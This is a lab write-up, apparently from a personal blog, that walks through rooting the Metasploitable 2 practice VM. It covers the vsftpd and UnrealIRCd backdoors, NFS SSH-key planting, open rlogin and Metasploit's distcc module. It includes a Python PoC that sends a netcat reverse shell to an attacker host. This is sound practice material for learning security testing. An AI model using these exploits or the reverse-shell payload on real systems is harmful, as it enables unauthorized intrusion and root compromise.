In this post I’m going to be exploring Metasploitable 2.

Metasploitable2 is a vulnerable machine from the good folks at Rapid7. It is “an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities.”

Ok, let’s get to it.

The services

A quick nmap of the host to see which services are running:

user@kali:~$ nmap 172.16.255.138

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-05-17 17:51 CDT
Nmap scan report for 172.16.255.138
Host is up (0.0023s latency).
Not shown: 978 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8180/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 13.28 seconds

Nearly all of these services provide a direct entry point for us. From here, I will go one-by-one and cover how to exploit the ones that are exploitable.

Regarding HTTP: Metasploitable2’s web-app component is robust. It contains the “Damn Vulnerable Web App” as well as some other vulnerable web applications like NOWASP Mutillidae, phpMyAdmin, tikiwiki, and WebDav. I’ve gone through those as well, but since it could fill a whole post on its own I’ll be saving that to cover another day. This time we’re just going to be penetrating the other vulnerable services.

FTP

The host is running a vulnerable ftp server:

user@kali:~$ nmap -sV -p 21 172.16.255.138

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-05-17 17:55 CDT
Nmap scan report for 172.16.255.138
Host is up (0.00066s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.33 seconds

Version 2.3.4 of vsftpd contains a known back door. If a user tries to authenticate with a “:)” smiley face in their username, the host will open a bind shell on TCP port 6200.

user@kali:~$ ftp 172.16.255.138
Connected to 172.16.255.138.
220 (vsFTPd 2.3.4)
Name (172.16.255.138:user): hacker:)
331 Please specify the password.
Password:

At which point the server will appear to hang. But if we connect to port 6200:

user@kali:~$ ncat -v 172.16.255.138 6200
Ncat: Version 7.25BETA1 ( https://nmap.org/ncat )
Ncat: Connected to 172.16.255.138:6200.
id
uid=0(root) gid=0(root)

We find a root shell.

NFS and SSH

The host serves NFS, and is misconfigured to share its root directory publicly:

user@kali:~$ showmount -e 172.16.255.138
Export list for 172.16.255.138
/ *

We simply mount the share, and copy our ssh key into its authorized keys file:

root@kali:~# mkdir /tmp/metasploitable2
root@kali:~# mount -t nfs 172.16.255.138:/ /tmp/metasploitable2
root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:BpNPzUAgrHze66YBnpOoxChRyhWhq4JQwfFwVNL/5Z4 root@kali
The key's randomart image is:
+---[RSA 2048]----+
| .+**oooo        |
|  o=oo.. +       |
| ooo. +.. o      |
|.+= .  =.   .    |
|+o.o .  S. o     |
|*+ +. ..  . .    |
|Bo= .  .   . .   |
|=  . .o     E    |
|.   .+.          |
+----[SHA256]-----+

root@kali:~# cat ~/.ssh/id_rsa.pub >> /tmp/metasploitable2/root/.ssh/authorized_keys
root@kali:~# umount /tmp/metasploitable2
root@kali:~# rmdir /tmp/metasploitable2

And then successfully log in as root:

root@kali:~# ssh root@172.16.255.138
[...]
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)

rlogin

The ports 512, 513 and 514 are open, indicating rlogin is enabled.

I test it out, and discover I can login as root with no password:

user@kali:~$ rlogin root@172.16.255.138
[...]
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)

Too bad they can’t all be so easy! ;)

IRC

The IRC service is UnrealIRCd 3.2.8.1:

user@kali:~$ nmap -sV -p 6667 172.16.255.138

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-05-17 13:11 CDT
Nmap scan report for 172.16.255.138
Host is up (0.0018s latency).
PORT     STATE SERVICE VERSION
6667/tcp open  irc     Unreal ircd
Service Info: Host: irc.Metasploitable.LAN

Which has a known backdoor triggered by sending “AB” + system commands.

Instead of using the Metasploit module, however, I’m going to write my own PoC.

#!/usr/bin/python
import socket

rhost = '172.16.255.138'
rport = 6667

payload = "AB;" + 'nc 172.16.255.133 80 -e /bin/sh;' + "\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((rhost, rport))
print(s.recv(1024))
s.send(payload)
s.close()

It’s a bit minimalist, but it will work. This script will connect to the vulnerable service and use netcat to send a reverse shell to my attacking machine on port 80.

user@kali:~$ chmod u+x unreal.py
user@kali:~$ ./unreal.py 
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...

Meanwhile I have an ncat listener waiting:

root@kali:~# ncat -v -lp 80
Ncat: Version 7.25BETA1 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 172.16.255.138.
Ncat: Connection from 172.16.255.138:56391.
id
uid=0(root) gid=0(root)

Success!

distccd

Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. It makes it easy to scale large compiler jobs across multiple systems. It’s also a gaping security hole for us to punch through.

This time I’ll be turning to Metasploit to exploit the vulnerability.

In Msfconsole:

msf > use exploit/unix/misc/distcc_exec
msf  exploit(distcc_exec) > set RHOST 172.16.255.138
msf  exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo al9BfrqMBh5PC0Yo;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "al9BfrqMBh5PC0Yo\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.255.138:4444 -> 172.16.255.130:38897) at 2017-04-16 16:23:15 -0700

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Simple. Metasploit makes exploitation a breeze.

Weak Credentials

Many of the accounts on Metasploitable2 use weak or default credentials. These can be bruteforced using tools like Hydra or Medusa, or even just guessed (e.g. “user:user”, “msfadmin:msfadmin”)

Conclusion

Metasploitable2 was my first intentionally vulnerable VM to attack and exploit. It was a lot of fun and I’m looking forward to moving on to harder challenges.

Until next time, EOF